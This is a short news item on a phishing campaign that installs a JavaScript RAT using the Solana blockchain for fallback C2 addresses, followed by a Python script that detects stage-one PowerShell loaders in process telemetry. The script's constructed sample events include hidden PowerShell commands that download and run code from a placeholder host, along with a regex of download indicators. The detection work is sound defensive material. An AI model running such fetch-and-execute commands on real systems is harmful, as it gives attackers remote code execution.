A New Trojan Operated via the Solana Blockchain

Cryptoverse

Cyber intelligence specialists from the Threat Intelligence Department of the Positive Technologies Security Expertise Center (PT ESC) detected an attack that used a malicious XLL file and ended with a Remote Access Trojan (RAT) installed on the victims' devices. PT ESC published details of the campaign on its Habr blog.

The attackers used phishing as the entry point: victims received emails with lures in the form of orders, commercial offers, and contracts. The malicious attachment could be disguised as an XLL add-in, an LNK shortcut, or an MSI installer. Running any of them fetched a PowerShell script, which in turn downloaded roughly 5 MB of obfuscated JavaScript. This was a modular RAT with a wide range of functions, from executing commands to collecting data from the infected system. A key feature of the campaign was the use of the Solana blockchain to obtain alternative C2 addresses: because fallback addresses are read from a public ledger rather than hard-coded into the implant, blocking or taking down a single C2 server does not cut the malware off from its operators, which makes the infrastructure more resilient and C2 nodes harder to block. PT ESC attributes the attack to the HeartlessSoul group. The campaign has been active since October 2025 and has hit organizations in several countries, including Russia, Moldova, Ukraine, Mexico, the United States, and Germany.

Source: Anti-Malware
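As an added illustration, not code from PT ESC or from the Anti-Malware write-up, the Python script below shows how a SOC might catch the first stage of the chain described above (an XLL loaded into Excel or an MSI launching PowerShell that pulls a script from the network) in process-creation telemetry. The events are constructed, Sysmon-style JSON records; the parent/child pairs, the command-line indicators and the severity thresholds are this example's own assumptions, and the URLs are placeholders. The Solana lookup is deliberately not modelled, because the write-up does not say how the implant reads the ledger.

```python
"""
Heuristic detection for stage one of an XLL/LNK/MSI -> PowerShell -> payload chain.
Sample events below are constructed for this example; they are not campaign telemetry.
"""
import json
import re

# Parents that should not normally launch PowerShell (assumption made here):
# excel.exe covers an XLL add-in loaded into Excel, msiexec.exe an MSI installer.
# A double-clicked LNK shows explorer.exe as the parent, which is far too noisy
# to alert on alone, so the LNK case is caught by the command-line check only.
SUSPICIOUS_PARENTS = {"excel.exe", "msiexec.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}

# Download and encoding indicators commonly seen in stage-one loaders (assumed list).
DOWNLOAD_PATTERNS = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\birm\b|"
    r"invoke-restmethod|start-bitstransfer|-enc(odedcommand)?\b|frombase64string)",
    re.IGNORECASE,
)


def basename(path):
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return the list of reasons a process-creation event looks like stage one."""
    reasons = []
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    if image in SCRIPT_HOSTS and parent in SUSPICIOUS_PARENTS:
        reasons.append(f"{image} spawned by {parent}")
    if image in SCRIPT_HOSTS and DOWNLOAD_PATTERNS.search(cmd):
        reasons.append("download/encoding indicator in command line")
    return reasons


def severity(reasons):
    """Two independent indicators -> high, one -> medium, none -> no alert."""
    return {0: None, 1: "medium"}.get(len(reasons), "high")


def detect(lines):
    """Parse JSON-lines events; return (RecordId, severity, reasons) for each hit."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        reasons = score_event(ev)
        if reasons:
            hits.append((ev["RecordId"], severity(reasons), reasons))
    return hits


# Constructed Sysmon-style process-creation events (raw string, so JSON escapes survive).
SAMPLE_EVENTS = r"""
{"RecordId": 1, "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "\"EXCEL.EXE\" \"C:\\Users\\u\\Downloads\\order_2025.xll\""}
{"RecordId": 2, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')\""}
{"RecordId": 3, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\msiexec.exe", "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"}
{"RecordId": 4, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -w hidden -c \"iwr http://example.invalid/a.ps1 -OutFile $env:TEMP\\a.ps1; . $env:TEMP\\a.ps1\""}
{"RecordId": 5, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe"}
"""

if __name__ == "__main__":
    for record_id, sev, reasons in detect(SAMPLE_EVENTS.splitlines()):
        print(f"RecordId {record_id}: {sev} - {'; '.join(reasons)}")
```

Record 1 (Excel opening the XLL) and record 5 (a user opening a console) produce no alert; records 2 and 3 pair an abnormal parent with a download or encoded command and score high; record 4, the LNK-style launch, scores medium on the command line alone. The expected volume of explorer.exe-parented PowerShell is what forces the split between the two indicators rather than a single "PowerShell from Explorer" rule.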
